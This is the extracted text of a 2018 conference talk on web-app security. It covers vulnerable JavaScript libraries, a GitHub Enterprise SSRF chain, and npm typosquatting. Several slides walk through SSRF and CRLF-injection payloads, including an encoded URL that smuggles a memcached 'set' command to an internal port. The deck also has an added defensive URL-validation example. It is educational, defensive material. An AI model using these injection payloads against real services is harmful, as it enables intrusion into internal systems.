Slide 1

Slide 1 text

How to hack an Angular app? @jawache ngConf 2018

Slide 2

Slide 2 text

How to hack a web app? @jawache ngConf 2018

Slide 3

Slide 3 text

Real Life Hacking Stories @jawache ngConf 2018

Slide 4

Slide 4 text

Asim Hussain @jawache codecraft.tv microsoft.com

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

Vulnerability vs. Exploit

Slide 7

Slide 7 text

@jawache #1

Slide 8

Slide 8 text

@jawache Photo by Kristina Flour on Unsplash 0 Day Exploit

Slide 9

Slide 9 text

@jawache Photo by Veri Ivanova on Unsplash 0 Day Exploit

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

@jawache

Slide 12

Slide 12 text

@jawache

Slide 13

Slide 13 text

@jawache

Slide 14

Slide 14 text

@jawache

Slide 15

Slide 15 text

"12 of top 50 data breaches were through known vulnerabilities" - snyk.io https://snyk.io/blog/owasp-top-10-breaches/ @jawache

Slide 16

Slide 16 text

"77% of 433,000 Sites Use Vulnerable JavaScript Libraries" - snyk.io https://snyk.io/blog/77-percent-of-sites-still-vulnerable/ @jawache

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

@jawache

Slide 19

Slide 19 text

@jawache nsp

Slide 20

Slide 20 text

@jawache Photo by energepic.com from Pexels Summary

Slide 21

Slide 21 text

#2 @orange_8361

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

git push @jawache http://example.com

Slide 24

Slide 24 text

@jawache git push http://0

Slide 25

Slide 25 text

@jawache git push http://0:8000/composer/send_email

Slide 26

Slide 26 text

    def send_email(request):
        try:
            recipients = request.GET['to'].split(',')
            url = request.GET['url']
            proto, server, path, query, frag = urlsplit(url)
            if query: path += '?' + query
            conn = HTTPConnection(server)
            conn.request('GET',path)
            resp = conn.getresponse()
            ...

@jawache

Slide 27

Slide 27 text

    http://0:8000/composer/send_email?
        to=orange@nogg&
        url=http://127.0.0.1:12345/foo

@jawache

Slide 28

Slide 28 text

    def send_email(request):
        try:
            recipients = request.GET['to'].split(',')
            url = request.GET['url']
            proto, server, path, query, frag = urlsplit(url)
            if query: path += '?' + query
            conn = HTTPConnection(server)
            conn.request('GET',path)
            resp = conn.getresponse()
            ...

@jawache

Slide 29

Slide 29 text

\r\n @jawache

Slide 30

Slide 30 text

%0D%0A @jawache

Slide 31

Slide 31 text

http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

Slide 32

Slide 32 text

    GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1
    Host: 127.0.0.1:12345
    Accept-Encoding: identity

@jawache

Slide 33

Slide 33 text

    GET /%0D%0Ahello%0D%0AFoo:\r\n
    HTTP/1.1\r\n
    Host: 127.0.0.1:12345\r\n
    Accept-Encoding: identity\r\n
    \r\n
    \r\n

@jawache

Slide 34

Slide 34 text

@jawache

    GET /\r\n
    hello\r\n
    Foo: HTTP/1.1\r\n
    Host: 127.0.0.1:12345\r\n
    Accept-Encoding: identity\r\n
    \r\n
    \r\n

Slide 35

Slide 35 text

...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

Slide 36

Slide 36 text

    GET /
    set key 0 900 4 data
    HTTP/1.1
    Host: 127.0.0.1:11211
    Accept-Encoding: identity

@jawache

Slide 37

Slide 37 text

code code @jawache

Slide 38

Slide 38 text

code code @jawache

Slide 39

Slide 39 text

@jawache Photo by Kelly Sikkema on Unsplash Summary
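An added example, not from the talk or from the code it quotes: one way to screen the `url` parameter that `send_email` (slides 26 and 28) hands straight to `HTTPConnection`, rejecting percent-encoded CR/LF and internal address literals such as `0` and `127.0.0.1` before any request is made. The helper names and the policy are assumptions for illustration, written for Python 3; DNS names would also need their resolved addresses checked at connect time.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit


def _ip_literal(host):
    """Parse host as an IP literal, including legacy forms ('0', '127.1')."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        # inet_aton accepts the short/hex/octal IPv4 forms, without any DNS lookup
        return ipaddress.ip_address(socket.inet_aton(host))
    except (OSError, ValueError):
        return None  # not an IP literal: treat it as a DNS name


def outbound_url_problem(url):
    """Return None if url may be fetched, else a short reason string.

    Hypothetical helper (not from the talk) covering the two issues the
    slides show: CR/LF smuggled in via percent-encoding, and internal targets.
    """
    # Check both the raw and the percent-decoded form for control characters.
    for text in (url, unquote(url)):
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in text):
            return "control character in URL"
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return "malformed URL"
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"
    if not host:
        return "missing host"
    ip = _ip_literal(host)
    if ip is not None and not ip.is_global:
        return "internal address"
    # A DNS name still has to be resolved and its addresses checked the same
    # way at connect time; that step needs the network and is omitted here.
    return None
```
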

Slide 40

Slide 40 text

#3 @jawache

Slide 41

Slide 41 text

@jawache

Slide 42

Slide 42 text

@jawache

Slide 43

Slide 43 text

No content

Slide 44

Slide 44 text

@jawache

Slide 45

Slide 45 text

cross-env vs. crossenv @jawache

Slide 46

Slide 46 text

@jawache Photo by Jairo Alzate on Unsplash Summary

Slide 47

Slide 47 text

@scope/package-name @jawache

Slide 48

Slide 48 text

package-name packagename package.name @jawache

Slide 49

Slide 49 text

Update Small vulnerability Don't trust anyone All the things Fix @jawache

Slide 50

Slide 50 text

Asim Hussain @jawache codecraft.tv microsoft.com

Slide 51

Slide 51 text

#1

How I Chained 4 vulnerabilities on GitHub Enterprise - Orange Tsai http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html

CRLF injection vulnerability in the HTTPConnection https://www.cvedetails.com/cve/CVE-2016-5699/

Slide 52

Slide 52 text

#2

Exploit DB https://www.exploit-db.com/

Metasploit https://www.metasploit.com/

Azure App Services https://aka.ms/azure-app-service-docs

Google App Engine https://cloud.google.com/appengine/

Heroku https://heroku.com

Amazon Beanstalk http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html

The Equifax hack and how to protect your family — all explained in 5 minutes https://medium.freecodecamp.org/the-equifax-hack-and-how-to-protect-your-family-all-explained-in-5-minutes-a2b5187cb6c0

Slide 53

Slide 53 text

#3

Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836

Malicious packages in npm. Here’s what to do - Ivan Akulov https://iamakulov.com/notes/npm-malicious-packages/